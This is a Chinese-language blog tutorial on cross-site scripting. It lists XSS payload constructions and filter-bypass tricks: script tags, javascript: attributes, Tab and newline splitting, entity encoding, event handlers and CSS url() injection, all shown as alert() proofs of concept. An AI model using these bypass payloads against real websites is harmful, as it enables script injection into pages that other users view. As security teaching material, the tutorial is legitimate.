XSS(跨站脚本攻击概述)构造绕过过滤

已于 2024-06-11 18:22:23 修改
阅读量507 收藏
点赞数
分类专栏: Web安全 #XSS 文章标签: XSS
于 2019-09-23 03:54:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39338006/article/details/101182623
版权

  • xss的分类

  1. 反射性XSS(通常出现在搜索框,登入口处)

  2. 持久型(通常出现在评论,留言,博客日志处)

  • xss的构造分类

  1. 利用<>标记注射 HTML/JAVASCRIPT 

   

<script>alert('xss')</script>

</textarea><script>alert('xss')</script>

  1. 利用HTML标签属性值执行xss(通常HTML标记中的属性都支持javascript:[code]伪协议的形式)注意:这里并非所有浏览器都支持。还有并非所有的属性值都能产生xss,可以使用下面的属性值来测试       

href=
lowsrc=
bgsound=
background=
value=
action=
dynsrc=

<table background="javascript:alert(/xss/)"></table>
<img src="javascript:alert('xss');"></img>

  1. 空格回车 TAB键 

<img src=java    script:alert(/xss/) width=100>
/*注意上面个不是空格是Tab符号*/
<img src=java
script:alert(/xss/) width=100>
<!--这里是回车符号-->

  1. 对标签属性值转码 ASCII码形式 因为HTML属性本身支持ASCII码形式 

<img src="javascript:alert('xss');">
<!--替换成-->
<img src="javascrip&#116&#58alert(/xss/);">

  1. 产生自己的事件(这里的意思是如果存在反射型客户端没人点击你构造的代码,那你就可以自己产生事件来执行你的代码) 比如click、mouseover、load等

<input type="button" value="click me" onclick="alert('click me')"/>
<img src="#" onerror=alert(/xss/)>

 其他事件属性

onResume
onReverse
onRowDelete
onRowInserted
OnSeek
onSeek
onSynchRestored
onTimeError
onTrackChange
onURLFlip
onRepeat
onMediaComplete
onMediaComplete

  1. CSS样式表 注意根据浏览器的不同CSS构造不一定通用 

<div style="background-image:url(javascript:alert('XSS'))></div>
<style>
body {background-image:url("javascript:alert('xss')")}
</style>

  1. 绕过过滤规则 例如大小写混合用 、不加双引号、编码十六、十、八、ASCII等 

今天就先到这里了,送上看到的一句话 东方吹破英雄梦,生活磨灭少年心 。

:::::::::
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
跨站脚本漏洞(xss)原理及绕过
qq_64775230的博客
06-14 69
丹尼在cookie上设置httponly标识后,浏览器就会知道这是特殊的cookie,只能由服务器检索,所有来自客户端脚本的访问都会被禁止。利用现有的xss平台,xss平台是一个测试xss漏洞获取cookie的平台,xss可以做js能做的所有事情,八廓但不限于窃取cookie、后台删改文章、钓鱼、李勇xss漏洞进行传播、修改网页代码、网站重定向、获取用户信息等。x:模式中的没有经过转义的或不在字符类中的空白数据字符总会被忽略,并且位于一个未转义的字符类外部的#字符和下一个换行符之间的字符也被忽略。
XSS跨站脚本攻击剖析与防御.docx
09-16
XSS编码技术是攻击者为了绕过Web应用的安全过滤机制,将恶意脚本编码为合法格式的一种手段。常见的XSS编码方式包括URL编码、HTML实体编码、Unicode编码、CSS编码等。 - **URL编码**:将特殊字符转换成%XY形式,如`...
XSS跨站脚本过滤
wanyuanshi的博客
04-16 1233
1.在web.xml中配置过滤器:拦截所有的请求--项目中使用通过安全扫描&lt;filter&gt; &lt;filter-name&gt;XssFilter&lt;/filter-name&gt; &lt;filter-class&gt;com.sunrise.grid.utils.XssFilter&lt;/filter-class&gt; &lt;/filter&gt; &lt;fil...
XSS跨站脚本攻击理论和实战 XSS构造脚本+手动XSS+利用BEef自动化XSS(网络安全学习13)
Until_U的博客
07-06 5402
CONTENTS 1 XSS简介 2 构造XSS脚本 2.1 常用的HTML标签 2.2 常用java script方法 2.3 构造XSS脚本 3 反射型XSS 4 存储型XSS 5 kali渗透获取cookie 6 自动化XSS 6.1 BEef简介 6.2 BEef的主要功能 6.3 BEef实战 1 XSS简介 (1)XSS相关概念 跨站脚本( cross site script )为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现...
xss跨站脚本过滤
u011697091的博客
03-05 2581
自定义XssRequestWrapper集成HttpServletRequestWrapper package com.workflow.base.filter; import org.apache.commons.lang.StringUtils; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import javax.servlet.http.HttpServletRequest; import javax.servlet.
XSS(跨站脚本)概述
最新发布
大雾
05-15 1025
特殊字符+唯一识别字符 '"这是特殊字符6666这是唯一识别字符查看页面源代码ctf+f查询666F12选取页面元素,把长度限度改成200发现弹框成功 (反射型是不存储的刷新页面代码就没了。
什么是XSS(跨站)攻击
wuhongze的专栏
04-16 349
·XSS(跨站)攻击的概念   XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。而本文主要讲的是利用XSS得到目标服务器的shell。技术虽然是老技术,...
跨站脚本,参考学习
04-28
#### 一、跨站脚本(XSS)概述 跨站脚本(Cross-Site Scripting,简称XSS)是一种常见的网站安全漏洞,攻击者通过注入恶意脚本代码到信任的网页上,当用户浏览该网页时,嵌入其中的恶意脚本会被执行,进而窃取用户的...
js脚本攻击大全
07-18
#### 一、XSS(跨站脚本)攻击概述 XSS(Cross Site Scripting),即跨站脚本攻击,是一种常见的网络安全漏洞,它允许攻击者将恶意脚本注入到看似可信的网站上。当用户浏览这些被注入恶意脚本的网页时,恶意脚本会...
AngularJs用户输入动态模板XSS攻击示例详解
10-18
跨站脚本攻击(Cross-Site Scripting,简称XSS)是Web应用中最常见的一种安全漏洞。XSS攻击通过注入恶意脚本到信任的应用程序或网站中,进而影响到最终用户的浏览器。这些恶意脚本会在用户的浏览器上执行,从而窃取...
Catfish(鲶鱼) Blog V1.3.15存储型 xss1
08-03
从代码中可以看出,只要提交的评论内容不包含上述标签或关键字,就能够成功绕过过滤机制。这为攻击者提供了可乘之机。 ##### 4. 攻击方法 攻击者可以通过提交包含恶意脚本的评论来利用这个漏洞。由于前端对某些类型...
XSS跨站介绍
qq_25899635的博客
05-23 279
什么是XSS?   XSS(cross-site scripting)跨站脚本一直被OWASP组织认为是十大安全漏洞之一。   XSS向用户浏览的页面中注入HTML/Javascript脚本,当用户浏览恶意网页时,浏览器会不加验证的执行HTML和Javascript脚本。从而造成Cookie资料窃取、会话劫持、钓鱼欺骗等威胁。   XSS(为了区分CSS)跨站脚本本身不针对服务器,只是借助网站传播...
什么是XSS跨站脚本攻击
彦彦专栏
12-13 2679
跨站脚本攻击(Cross-site scripting,通常简称为XSS)是一种网站应用程式的安全漏洞攻击,允许恶意使用者将程式码注入到网页上,其他使用者在观看网页时就会受到影响。这类攻击通常包含了HTML以及使用者端脚本语言。一般而言,跨站脚本攻击漏洞常见于网页允许攻击者通过输入对网页内容进行改写的地方。由于利用巧妙的注入恶意的指令码到由其他域网页的方法,攻击者可得到了更高的特权,窃取机密的网页
XSS漏洞-03】XSS漏洞语句构造绕过方法实例
m0_64378913的博客
05-14 4258
目录1 XSS语句构造方式1.1 第一种:利用[<>]构造HTML/JS语句1.2 第二种:利用javascript:伪协议1.3 第三种:事件驱动1.4 第四种:利用CSS(层叠样式脚本)1.5 其他标签及手法2 XSS语句变形及绕过2.1 第一种:大小写混编2.2 第二种:**双写绕过**。2.3 第三种:**引号的使用**2.4 第四种:使用 [/] 代替空格2.5 第五种:在一些关键字内插入回车符与Tab符2.6 第六种:编码绕过2.7 第七种:拆分跨站2.8
什么是XSS跨站攻击?
linhui03的博客
11-14 344
XSS又叫CSS  (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。
XSS跨站脚本攻击
全栈菜鸟的博客
11-13 184
文章目录攻击条件类型反射型xss 攻击条件 1、用户能控制输入 2、原本程序要执行的代码,拼接了用户输入的数据然后执行 类型 反射型xss ` 非持久型,需要欺骗用户自己去点击链接才能触发xss代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。反射型xss大多数用来盗取用户的cookie信息。 ...
Web安全入门——跨站脚本攻击XSS
wangluoanquan152的博客
01-22 1291
跨站脚本攻击XSS)是客户端安全的头号大敌,OWASP TOP 10多次把xss列在榜首。 XSS攻击是指黑客通过“HTML注入”篡改网页,插入恶意的脚本,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。
XSS 跨站脚本攻击构造剖析(二)
a18946983682的博客
08-08 67
1.利用字符编码 (1)字符编码在跨站脚本中经常运用到,透过这种技巧,不仅能让XSS代码绕过服务端的过滤,还能更好的隐藏ShellCode (2)使用一个XSS编码工具,以便对字符串进行十进制和十六进制的编码解码,该工具还可以实现ESCAPE转码和解码 例如:<img src="javascript:alert('xss');"> 编码后: ...
XSS跨站漏洞原理
xingkong90的专栏
01-03 1389
XSS跨站漏洞很简单!他并不是什么跨越站进行提权之类的! 跨站脚本攻击又被称之为CSS攻击,是指入侵攻击者通过某种方式,在远程的Web页面的HTML代码中写入特殊的字符串。 当其他上网者在浏览此页面时,嵌入页面中的这些字符就会被作为一段脚本代码而执行。所以有时候也被叫做XSS攻击! XSS跨站漏洞原理就是利用网站里面的编辑器过滤不严而导致的! 比如:某个后台的新闻编辑过滤
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

:::::::::

生活多磨赚钱可多

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值